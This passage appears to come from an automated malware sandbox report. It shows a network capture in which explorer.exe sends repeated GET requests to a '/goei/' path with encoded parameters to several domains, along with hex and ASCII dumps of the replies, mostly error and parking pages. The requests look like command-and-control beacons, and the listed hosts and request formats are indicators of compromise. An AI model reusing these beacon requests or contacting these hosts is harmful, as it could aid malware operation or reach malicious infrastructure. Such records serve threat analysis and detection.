4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 44 49 56 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 49 4e 50 55 54 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 49 4d 47 20 7b 0d 0a 09 42 4f 52 44 45 52 2d 52 49 47 48 54 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 54 4f 50 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 4c 45 46 54 3a 20 30 70 78 3b 20 42 4f 52 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 30 70 78 0d 0a 7d 0d 0a 54 44 20 7b 0d 0a 09 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 4c 49 4e 45 2d 48 45 49 47 48 54 3a 20 31 35 30 25 0d 0a 7d 0d 0a 54 48 20 7b 0d 0a 09 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 4c 49 4e 45 2d 48 45 49 47 48 54 3a 20 31 35 30 25 0d 0a 7d 0d 0a 23 66 20 7b 0d 0a 09 4d 41 52 47 49 4e 3a 20 30 70 78 3b 20 50 41 44 44 49 4e 47 2d 54 4f 50 3a 20 34 70 78 0d 0a 7d 0d 0a 23 42 20 7b 0d 0a 09 57 49 44 54 48 3a 20 38 30 30 70 78 0d 0a 7d 0d 0a 2e 68 65 61 64 65 72 20 7b 0d 0a 09 42 4f 52 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 23 62 32 64 30 65 61 20 31 70 78 20 73 6f
                                                                    Data Ascii: 19e3<html> <head> <title>ly-iot.com - The domain is available for purchase</title><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/><script src="http://libs.baidu.com/jquery/1.9.0/jquery.js"></script><script>$(document).ready(function(){if(window.screen.height<700){$("*").css({"width":"auto","height":"auto","background-image":"none","position":"static"});$("p").css("color","black");$(".stencil-tip").css("line-height","30px");}});</script> <style type="text/css">BODY {FONT-SIZE: 12px; MARGIN: 18px 0px 0px; COLOR: #424242; BACKGROUND-COLOR: #fff; TEXT-ALIGN: center}TD {FONT-FAMILY: Arial}P {FONT-FAMILY: Arial}DIV {FONT-FAMILY: Arial}INPUT {FONT-FAMILY: Arial}IMG {BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px}TD {FONT-SIZE: 12px; LINE-HEIGHT: 150%}TH {FONT-SIZE: 12px; LINE-HEIGHT: 150%}#f {MARGIN: 0px; PADDING-TOP: 4px}#B {WIDTH: 800px}.header {BORDER-BOTTOM: #b2d0ea 1px so


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.649726104.161.84.10080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:46:48.335388899 CEST1385OUTGET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.ronwongart.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:46:48.497931004 CEST1403INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 08 Apr 2021 10:47:07 GMT
                                                                    Content-Type: text/html; charset=GBK
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Data Raw: 32 33 63 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 23c<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.649741198.185.159.14480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:46:58.836958885 CEST5606OUTGET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.pimpmyrecipe.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:46:58.951539993 CEST5609INHTTP/1.1 400 Bad Request
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Content-Length: 77564
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Date: Thu, 08 Apr 2021 10:46:58 UTC
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                    Pragma: no-cache
                                                                    Server: Squarespace
                                                                    X-Contextid: rofEdlC9/lBVebWxJ
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.64974234.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:47:09.092782021 CEST6398OUTGET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.foodsystemsjusticeproject.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:09.209527016 CEST6398INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Thu, 08 Apr 2021 10:47:09 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "606abe1d-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.649743193.168.194.20680C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:47:17.752739906 CEST6399OUTGET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.batiktintaemas.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:24.087763071 CEST6409INHTTP/1.1 301 Moved Permanently
                                                                    Connection: close
                                                                    X-Powered-By: PHP/7.2.34
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://batiktintaemas.com/goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz
                                                                    Content-Length: 0
                                                                    Date: Thu, 08 Apr 2021 10:47:23 GMT
                                                                    Server: LiteSpeed
                                                                    Vary: User-Agent


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    5192.168.2.649749199.59.242.15380C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:47:33.692498922 CEST6429OUTGET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.addthat.xyz
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:33.802937031 CEST6430INHTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Thu, 08 Apr 2021 10:47:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a7msil34EyaoVjODEDUQ2ff4sUDhxeCYFMDh2tCvLxODdKADG02BsrkHtQfUPBUVH5YKtKdN4CUGklYGwKwPLA==
                                                                    Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 61 37 6d 73 69 6c 33 34 45 79 61 6f 56 6a 4f 44 45 44 55 51 32 66 66 34 73 55 44 68 78 65 43 59 46 4d 44 68 32 74 43 76 4c 78 4f 44 64 4b 41 44 47 30 32 42 73 72 6b 48 74 51 66 55 50 42 55 56 48 35 59 4b 74 4b 64 4e 34 43 55 47 6b 6c 59 47 77 4b 77 50 4c 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                    Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a7msil34EyaoVjODEDUQ2ff4sUDhxeCYFMDh2tCvLxODdKADG02BsrkHtQfUPBUVH5YKtKdN4CUGklYGwKwPLA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    6192.168.2.64975085.159.66.9380C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:47:38.938357115 CEST6435OUTGET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.evecrude.xyz
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:38.990061045 CEST6436INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Server: Microsoft-IIS/10.0
                                                                    X-Powered-By: ASP.NET
                                                                    Date: Thu, 08 Apr 2021 10:47:16 GMT
                                                                    Connection: close
                                                                    Content-Length: 1245
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 